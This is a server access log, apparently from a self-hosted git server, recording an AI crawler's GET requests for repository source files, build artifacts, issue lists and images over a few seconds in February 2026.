[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11042] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:02:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:18:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:18:02:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:18:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:18:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13145] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" -[17/Feb/2026:18:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html?display=source" [Client 74.7.227.38] [Length 22731] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" -[17/Feb/2026:18:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13313] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10135] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10139] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13314] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11077] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13353] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13352] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?files=.TemporaryDocument%2f%ed%95%84%ec%9a%94%20Linux%eb%aa%85%eb%a0%b9%eb%93%a4%20%eb%aa%a8%ec%9d%8c.md" [Client 74.7.227.38] [Length 17078] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:18:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:02:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/.vscode/settings.json" -[17/Feb/2026:18:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/.vscode/settings.json" -[17/Feb/2026:18:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/favicon.ico" -[17/Feb/2026:18:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png?display=rendered" [Client 74.7.227.38] [Length 11105] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png" -[17/Feb/2026:18:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/reactor.png?display=rendered" [Client 74.7.227.38] [Length 11108] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/reactor.png" -[17/Feb/2026:18:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" -[17/Feb/2026:18:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 10983] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:18:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12062] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:18:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:18:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:18:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12062] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12061] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:18:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:18:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 10983] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:18:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:18:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12063] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12061] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12064] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:02:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:18:02:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12060] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:02:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 